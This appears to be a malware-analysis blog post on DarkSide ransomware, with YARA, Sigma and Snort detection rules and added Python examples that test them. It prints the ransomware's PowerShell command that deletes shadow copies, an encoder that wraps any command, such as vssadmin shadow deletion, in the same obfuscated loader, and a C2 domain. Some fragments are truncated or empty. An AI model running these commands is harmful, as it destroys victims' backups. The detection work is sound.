In August 2020 a new type of malware, belonging to the ransomware category, appeared in the cyber threat landscape. The threat actor responsible for its development called it "DarkSide" and, like other pieces of malware of this type, it is operated in Big Game Hunting (BGH) campaigns. Around the same time, a DLS (Dedicated Leak Site) was made available on the dark web (behind the TOR network) in order to report the first victims.

On their DLS, DarkSide operators claimed to be experienced in conducting cyber operations, having previously used other, not better identified, ransomware variants. Indeed, some characteristics of their operations support the hypothesis that the group could be a former affiliate of some other RaaS (Ransomware as a Service) program that chose to write its own ransomware, likely to avoid sharing the profits of its criminal activities with third parties.


DarkSide is a well-written malware family, not much changed compared to the first versions analyzed. Usually the samples belonging to this family present, as already reported in other technical articles, some functionality aimed at making analysis harder. Indeed, in a recent sample (sha256: 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61), at 0040182A we find a sub aimed at dynamically resolving DLLs and APIs through LoadLibrary / GetProcAddress. sub_4016D5, sub_4013DA and sub_401AC3 are also involved in this process. The following screenshot shows a chunk of code extracted from the whole function designed for this purpose:

This can be a useful place from which to build a code-chunk based YARA rule aimed at hunting further variants of the same malware family. After selecting two representative chunks we can obtain something similar to the following:

rule DarkSide_Ransomware_827333_39928 : CRIMEWARE {
    meta:
        author = "Emanuele De Lucia"
        description = "Detects possible variants of DarkSide ransomware"
        hash1 = "17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61"
    strings:
        // call 0x4016d5
        // push esi
        // call 0x408195
        // mov ebx, eax
        // push dword ptr [esi - 4]
        // push esi
        // call 0x4013da
        // mov eax, dword ptr [esi - 4]
        // lea esi, [esi + eax]
        // mov ecx, 0x23
        $ = { E8 [4] 56 E8 [4] 8B D8 FF 76 ?? 56 E8 [4] 8B 46 ?? 8D 34 06 B9 ?? ?? ?? ?? }
    condition:
        any of them
}

DarkSide also employs techniques for privilege escalation and UAC (User Account Control) bypass. The technique observed in this case is known as CMSTPLUA UAC Bypass and abuses the ShellExec method of the CMSTPLUA COM interface {3E5FC7F9-9A51-4367-9063-A120244FBEC7}. This allows it to start a process with elevated permissions, according to the following graph:

PowerShell is used in order to delete shadow copies, preventing the recovery of previously backed-up files through them, according to the following syntax:

powershell -ep bypass -c
.Substring(2*$_,2))};iex $s"
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

In this case, a quick Sigma rule can be employed in order to hunt for similar system-side behaviors.

title: Detects possible DarkSide infection through PowerShell cmdline used to delete Shadow copies
status: stable
description: Detects possible DarkSide infection through PowerShell cmdline used to delete Shadow copies
author: Emanuele De Lucia
references:
    - internal research
tags:
    - attack.t1086
    - attack.t1064
date: 2020/12/01
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '(0..61)|%{$s+=[char][byte]'
            - '4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'
    condition: selection
level: high
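The following Python is an added example, not code from the original article: it reproduces the Sigma selection above over a few constructed Sysmon-style process-creation events, and additionally decodes the hex loader the way PowerShell would, so that a re-encoded payload (different length, different hex) is still caught by inspecting the decoded command. The event dictionaries, the vssadmin variant and the SHADOW_COPY_HINTS list are assumptions made for the demonstration; the DarkSide command line and hex blob are the ones shown above.

```python
import re

# Strings from the Sigma rule above (the DarkSide hex blob is reproduced verbatim).
DARKSIDE_HEX = ("4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
                "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20")
IMAGE_SUFFIX = "\\powershell.exe"
CMDLINE_MARKERS = ("(0..61)|%{$s+=[char][byte]", DARKSIDE_HEX)

# The full command line as observed on this page, passed as one argument to cmd.exe.
DARKSIDE_CMDLINE = (
    'powershell -ep bypass -c "(0..61)|%{$s+=[char][byte](\'0x\'+\''
    + DARKSIDE_HEX + '\'.Substring(2*$_,2))};iex $s"'
)

# Decoded fragments that mean "shadow copies are being destroyed", whatever the encoding (assumed list).
SHADOW_COPY_HINTS = ("win32_shadowcopy", "vssadmin delete shadows", "wmic shadowcopy delete")

# Generic shape of the loader: (0..N)|%{$s+=[char][byte]('0x'+'<hex>'.Substring(2*$_,2))};iex $s
_HEX_LOADER = re.compile(
    r"\(0\.\.(\d+)\)\|%\{\$s\+=\[char\]\[byte\]\('0x'\+'([0-9A-Fa-f]+)'"
    r"\.Substring\(2\*\$_,2\)\)\};\s*iex \$s", re.IGNORECASE)


def decode_hex_loader(cmdline):
    """Return the text the loader would execute, or None if the loader shape is absent."""
    m = _HEX_LOADER.search(cmdline)
    if not m:
        return None
    count = int(m.group(1)) + 1                 # PowerShell's (0..N) yields N+1 values
    hexstr = m.group(2)[:2 * count]
    hexstr = hexstr[:len(hexstr) // 2 * 2]      # ignore a dangling odd nibble
    return bytes.fromhex(hexstr).decode("ascii", errors="replace")


def build_loader(command):
    """Re-encode an arbitrary command in the same loader shape (constructed variant for testing)."""
    hexstr = command.encode("ascii").hex().upper()
    return ('powershell -ep bypass -c "(0..%d)|%%{$s+=[char][byte](\'0x\'+\'%s\''
            '.Substring(2*$_,2))};iex $s"' % (len(command) - 1, hexstr))


def matches_sigma_selection(event):
    """Sigma semantics: string modifiers are case-insensitive, list values are OR-ed."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return image.endswith(IMAGE_SUFFIX.lower()) and any(m.lower() in cmd for m in CMDLINE_MARKERS)


def triage(events):
    """Return (index, reason, decoded_command) for every event worth escalating."""
    hits = []
    for i, ev in enumerate(events):
        decoded = decode_hex_loader(ev.get("CommandLine", ""))
        if matches_sigma_selection(ev):
            hits.append((i, "sigma", decoded))
        elif decoded and any(h in decoded.lower() for h in SHADOW_COPY_HINTS):
            hits.append((i, "decoded", decoded))
    return hits


# Constructed process-creation events (not real telemetry).
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"Image": PS_IMAGE, "CommandLine": DARKSIDE_CMDLINE},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Image": PS_IMAGE, "CommandLine": "powershell -c Get-Date"},
    # same loader, different payload and length: the Sigma markers miss it, decoding does not
    {"Image": PS_IMAGE, "CommandLine": build_loader("vssadmin delete shadows /all /quiet")},
]

if __name__ == "__main__":
    for index, reason, decoded in triage(EVENTS):
        print(index, reason, decoded)
```

The Sigma rule keys on two literal substrings of one specific command line, so it is precise but brittle: the fourth event uses exactly the same loader with a different payload and passes it untouched. Decoding the loader first and matching on the resulting command is the cheap way to cover that whole family of command lines.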

Before executing the main payload, the sample performs several other activities such as information gathering (e.g. retrieving disk information)


and a comparison of the running system services against a predefined list, in order to stop those services that could interfere with the file encryption process.

The following are the services the malware looks for:


These areas can likewise be used to extract known-bad pieces of code. The chunk below opens a service with DELETE | SERVICE_STOP access (0x10020), sends it control code 1 (SERVICE_CONTROL_STOP) with a 0x1c-byte SERVICE_STATUS buffer and closes the handle:

rule DarkSide_Ransomware_827333_39929 : CRIMEWARE {
    meta:
        author = "Emanuele De Lucia"
        description = "Detects possible variants of DarkSide ransomware"
        hash = "17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61"
    strings:
        // push 0x10020                   ; DELETE | SERVICE_STOP
        // push dword ptr [edi]
        // push dword ptr [ebp - 4]
        // call dword ptr [0xcf0e66]
        // mov dword ptr [ebp - 8], eax
        // cmp dword ptr [ebp - 8], 0
        // je 0xce4d83
        // push 0x1c                      ; sizeof(SERVICE_STATUS)
        // lea eax, [ebp - 0x30]
        // push eax
        // call 0xce13da
        // lea eax, [ebp - 0x30]
        // push eax
        // push 1                         ; SERVICE_CONTROL_STOP
        // push dword ptr [ebp - 8]
        // call dword ptr [0xcf0e6a]
        // push dword ptr [ebp - 8]
        // call dword ptr [0xcf0e6e]
        $ = { 68 [4] FF 37 FF 75 ?? FF 15 [4] 89 45 ?? 83 7D [2] 74 ?? 6A ?? 8D 45 ?? 50 E8 [4] 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 [4] FF 75 ?? FF 15 ?? ?? ?? ?? }
    condition:
        any of them
}
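As an added example (not code from the original article), the Python below reimplements the matching semantics of the two hex strings above, so that the code-chunk patterns can be checked against a buffer without yara-python. The buffer is assembled by hand from the disassembly listed in the two rules, with made-up call targets, displacements and jump offsets; it is constructed test data, not bytes taken from the sample.

```python
import re

# Hex strings copied from the two code-chunk YARA rules above.
RULES = {
    "DarkSide_Ransomware_827333_39928":
        "E8 [4] 56 E8 [4] 8B D8 FF 76 ?? 56 E8 [4] 8B 46 ?? 8D 34 06 B9 ?? ?? ?? ??",
    "DarkSide_Ransomware_827333_39929":
        "68 [4] FF 37 FF 75 ?? FF 15 [4] 89 45 ?? 83 7D [2] 74 ?? 6A ?? 8D 45 ?? 50 "
        "E8 [4] 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 [4] FF 75 ?? FF 15 ?? ?? ?? ??",
}

# One token at a time: a jump [n] or [n-m], a whole-byte wildcard ??, or a literal byte.
_TOKEN = re.compile(r"\[(\d+)(?:-(\d+))?\]|\?\?|[0-9A-Fa-f]{2}")


def yara_hex_to_regex(pattern):
    """Translate the YARA hex-string subset used by these rules into a bytes regex.

    Supported: literal byte (E8), single-byte wildcard (??), fixed jump ([4]) and
    ranged jump ([2-4]). Nibble wildcards (E?) and alternatives ((A|B)) are not
    needed here and raise ValueError instead of silently matching nothing.
    """
    parts, pos = [], 0
    for m in _TOKEN.finditer(pattern):
        if pattern[pos:m.start()].strip():
            raise ValueError("unsupported token near %r" % pattern[pos:m.start()])
        pos = m.end()
        tok = m.group(0)
        if tok == "??":
            parts.append(b".")
        elif tok.startswith("["):
            lo = int(m.group(1))
            hi = int(m.group(2)) if m.group(2) else lo
            parts.append(b".{%d,%d}" % (lo, hi))
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    if pattern[pos:].strip():
        raise ValueError("unsupported token near %r" % pattern[pos:])
    return re.compile(b"".join(parts), re.DOTALL)   # DOTALL: a wildcard must also match 0x0A


# Constructed buffers: the listed instructions encoded by hand (placeholder operands).
API_RESOLVER_CHUNK = bytes.fromhex(
    "E8 11 22 33 44"        # call 0x4016d5 (rel32 placeholder)
    "56"                    # push esi
    "E8 55 66 77 88"        # call 0x408195
    "8B D8"                 # mov ebx, eax
    "FF 76 FC"              # push dword ptr [esi - 4]
    "56"                    # push esi
    "E8 99 AA BB CC"        # call 0x4013da
    "8B 46 FC"              # mov eax, dword ptr [esi - 4]
    "8D 34 06"              # lea esi, [esi + eax]
    "B9 23 00 00 00"        # mov ecx, 0x23
)
SERVICE_STOP_CHUNK = bytes.fromhex(
    "68 20 00 01 00"        # push 0x10020 (DELETE | SERVICE_STOP)
    "FF 37"                 # push dword ptr [edi]
    "FF 75 FC"              # push dword ptr [ebp - 4]
    "FF 15 66 0E CF 00"     # call dword ptr [0xcf0e66]
    "89 45 F8"              # mov dword ptr [ebp - 8], eax
    "83 7D F8 00"           # cmp dword ptr [ebp - 8], 0
    "74 2A"                 # je (rel8 placeholder)
    "6A 1C"                 # push 0x1c
    "8D 45 D0"              # lea eax, [ebp - 0x30]
    "50"                    # push eax
    "E8 11 22 33 44"        # call 0xce13da
    "8D 45 D0"              # lea eax, [ebp - 0x30]
    "50"                    # push eax
    "6A 01"                 # push 1 (SERVICE_CONTROL_STOP)
    "FF 75 F8"              # push dword ptr [ebp - 8]
    "FF 15 6A 0E CF 00"     # call dword ptr [0xcf0e6a]
    "FF 75 F8"              # push dword ptr [ebp - 8]
    "FF 15 6E 0E CF 00"     # call dword ptr [0xcf0e6e]
)
# A fake "image": padding, chunk 1 at offset 16, NOP sled, chunk 2 at offset 57.
SAMPLE_IMAGE = b"\x00" * 16 + API_RESOLVER_CHUNK + b"\x90" * 8 + SERVICE_STOP_CHUNK + b"\xcc" * 4


def scan(data):
    """Offsets at which each rule's hex string matches; a non-empty list satisfies `any of them`."""
    return {name: [m.start() for m in yara_hex_to_regex(pat).finditer(data)]
            for name, pat in RULES.items()}


def near_miss():
    """Chunk 1 with `lea esi, [esi + eax]` rewritten as `add esi, eax; nop`: same semantics, no match."""
    return SAMPLE_IMAGE.replace(bytes.fromhex("8D 34 06"), bytes.fromhex("01 C6 90"))


if __name__ == "__main__":
    print(scan(SAMPLE_IMAGE))
    print(scan(near_miss()))
```

The near-miss case is the usual caveat with code-chunk signatures: the wildcards absorb relocated call targets and stack displacements, which is what makes the rules survive rebuilds of the same source, but a recompilation that picks a different instruction for the same operation breaks the match.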

After the encryption phase, DarkSide is designed to communicate with its command and control server in order to share details about the victim (victimID) as well as further parameters useful for recovering the encrypted files and identifying the affiliate. Most probably these network capabilities have been added in order to support the RaaS model. In the analyzed sample, the CnC (Command and Control) is attested over the domain name carried by the rule that follows. Detecting network activities potentially related to this threat could therefore involve writing Snort rules similar to the following:

alert udp $HOME_NET any -> any 53 (msg:"DNS request for a blacklisted domain"; content:"|0f|securebestapp20|03|com|00|"; nocase; sid:[SID HERE]; rev:1;)
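To make the content bytes in that rule concrete, here is an added Python example (not part of the original article) that encodes a domain into DNS wire format, renders it in Snort's |xx| content notation and checks constructed A queries against it, reproducing what the content: option does on the UDP payload. The domain is the one carried by the rule above; the query packets are built locally and never sent.

```python
import struct

C2_DOMAIN = "securebestapp20.com"   # the domain carried by the rule's content: option


def encode_qname(domain):
    """DNS wire-format name: each label prefixed by its length, terminated by a zero byte."""
    out = b""
    for label in domain.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError("DNS labels must be 1..63 bytes: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def snort_content(domain):
    """The same bytes in Snort's mixed |hex|/text content notation."""
    labels = domain.rstrip(".").split(".")
    return '"' + "".join("|%02x|%s" % (len(l), l) for l in labels) + '|00|"'


def snort_rule(domain, sid):
    """Rule text in the shape used above; `sid` must come from your local SID range."""
    return ('alert udp $HOME_NET any -> any 53 (msg:"DNS request for %s"; '
            'content:%s; nocase; sid:%d; rev:1;)' % (domain, snort_content(domain), sid))


def build_dns_query(domain, txid=0x1234):
    """Constructed A/IN query: header (RD set, QDCOUNT=1) plus one question, as a stub resolver sends it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(domain) + struct.pack("!HH", 1, 1)


def rule_matches(payload, domain=C2_DOMAIN, nocase=True):
    """What content: does: a raw substring search over the UDP payload (nocase folds ASCII letters)."""
    needle = encode_qname(domain)
    return (needle.lower() in payload.lower()) if nocase else (needle in payload)


if __name__ == "__main__":
    print(snort_rule(C2_DOMAIN, 1000001))
    for name in ("securebestapp20.com", "cdn.securebestapp20.com", "xsecurebestapp20.com"):
        print(name, rule_matches(build_dns_query(name)))
```

Because the needle starts with the label length (0x0f) and ends with the root byte, a longer label such as xsecurebestapp20.com does not match, while any subdomain of the C2 name does, which is usually what you want for a C2 indicator. The rule only sees plain DNS over UDP/53; resolution through DNS over TCP, DoH or a resolver outside the monitored segment needs a different vantage point, such as the Sigma DNS rule further below.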

This domain name was created on 16/09/2020 and, according to my visibility, at the time of writing it has a history of two (2) A records. The interesting one is the address it resolved to from 21/09/2020 (day of the first observed resolution) to 05/01/2021 (day of the last observed resolution): the pDNS count for this domain name over that period is less than 180, and most of the resolutions occurred from early November until today. This suggests a growth of the spread and obviously of the RaaS business as well. In general, moreover, this number is also consistent with the low overall volume of DarkSide campaigns observed at least until mid-November 2020, which is further confirmed by the payload-side visibility I have for this malware family. The following are the detection hits for the DarkSide malware family up to December 2020:

Welcome to Darkside

On 11/10/2020 a user posted an announcement titled "[Affiliate Program] Darkside Ransomware" on a Russian-speaking dark web forum. The text of that post officially started the project's affiliate program. Press articles have been used to advertise the program itself as well as the skills of the group, which are "aimed only at large corporations", as originally posted by the threat actor itself:

Not welcome in the affiliate program are, among others, English-speaking persons, employees of secret services, security researchers, the greedy (at least as far as I understand), etc.

There are, moreover, some rules to be respected, such as avoiding targeting entities within countries belonging to the CIS (Содружество Независимых Государств, the Commonwealth of Independent States), including Georgia and Ukraine, or those operating in the education, medical, public and non-profit sectors.

As you might imagine for any other job, there is a selection process to go through in order to be included in the program. This includes an interview to check the candidate's skills and experience, such as having previously been affiliated with some other program.

The group offers Windows and Linux versions of the DarkSide ransomware plus an admin panel, a leak site and a CDN system for data storage.

So, do you have ESXi?

At the end of November 2020, a Linux variant (ELF64) of DarkSide ransomware was uploaded to a well-known online malware repository. At the time of upload its detection rate was practically non-existent, and even at the time of writing (Jan 2021) it is very low (2/63). It seems to have a quite different purpose from its Windows counterpart: while the latter is born to encrypt all user files on a workstation (documents, images, PDFs and so on), the Linux version has been created to damage virtual machines on servers. Indeed, the sample looks for extensions related to VMware files such as .vmdk, .vmem and .vswp, plus generic log formats.

The ransom note is similar to the Windows one

and the output of the executable, once launched, confirms the focus on ESXi environments

as /vmfs/volumes/ is the default location of ESXi virtual machines.

A strict YARA rule similar to the following can help in identifying Linux variants of DarkSide:

rule DarkSide_Ransomware_827333_39930 : CRIMEWARE {
    meta:
        author = "Emanuele De Lucia"
        description = "Detects possible Linux variants of DarkSide ransomware"
        hash1 = "da3bb9669fb983ad8d2ffc01aab9d56198bd9cedf2cc4387f19f4604a070a9b5"
    strings:
        $ = "vmdk,vmem,vswp,log" fullword ascii
        $ = "XChaCha20" fullword ascii
        $ = "Partial File Encryption Tool" fullword ascii
        $ = "main.log" fullword ascii
    condition:
        uint16(0) == 0x457f and all of them
}

Also in the Linux version, communications with the outside world take place through the same domain name reported above and a URL specially crafted for each victim. With Sigma it is possible to write rules aimed at detecting DNS resolution requests for the domain name where the command and control is actually attested:

title: Detects resolution requests to DarkSide Command and Control domain name
status: stable
description: Detects resolution requests to DarkSide Command and Control domain name
author: Emanuele De Lucia
date: 2020/12/01
references:
    - internal research
tags:
    - attack.t1071.001
logsource:
    category: dns
detection:
    selection:
        query:
            - ''
    condition: selection
level: high

Adversary Profile

From mid-November 2020, following the affiliate program, it is more difficult to associate the exclusive use of DarkSide ransomware with a specific threat actor. However, some similarities with REvil suggest that its developer may be familiar with that solution, to the point of speculating that it may come from a former REvil affiliate who, in order to have more control over operations and not to split the profits, launched his own project, further enhanced by an independent affiliate program.

Regardless of the specific actor behind the operations, DarkSide can be delivered via several vectors, usually after gathering information about the target. According to my visibility, at least one threat actor who used DarkSide adopted phishing (T1566) to deliver a first-stage payload whose execution finally allowed the distribution of DarkSide variants within the victim environment. Other intrusion techniques involve exploiting vulnerabilities in exposed applications (T1190) to get a first foothold from which to perform lateral movement.


Technique | Tactic | Description
T1190 | Initial Access | Adversaries may attempt to take advantage of a weakness in an Internet-facing application using software, data, or commands in order to cause unintended or unanticipated behavior.
T1566 | Initial Access | Adversaries may send phishing messages to gain access to victim systems.
T1059.001 | Execution | Adversaries may abuse PowerShell commands and scripts for execution.
| Execution | Adversaries may abuse VBS scripts in order to perform tasks on the victim's machine.
T1548.002 | Privilege Escalation | Adversaries bypass UAC mechanisms to elevate privileges on the system.
T1218.003 | Defense Evasion | Adversaries abuse CMSTP to proxy execution of malicious code.
T1140 | Defense Evasion | Adversaries may use obfuscated files or information to hide artifacts of an intrusion from analysis.
T1083 | Discovery | Adversaries enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1057 | Discovery | Adversaries attempt to get information about running processes on a system.
T1071.001 | Command and Control | Adversaries may communicate using application layer protocols associated with web traffic.
T1486 | Impact | Adversaries encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.
T1489 | Impact | Adversaries stop or disable services on a system to render those services unavailable.

Indicators of Compromise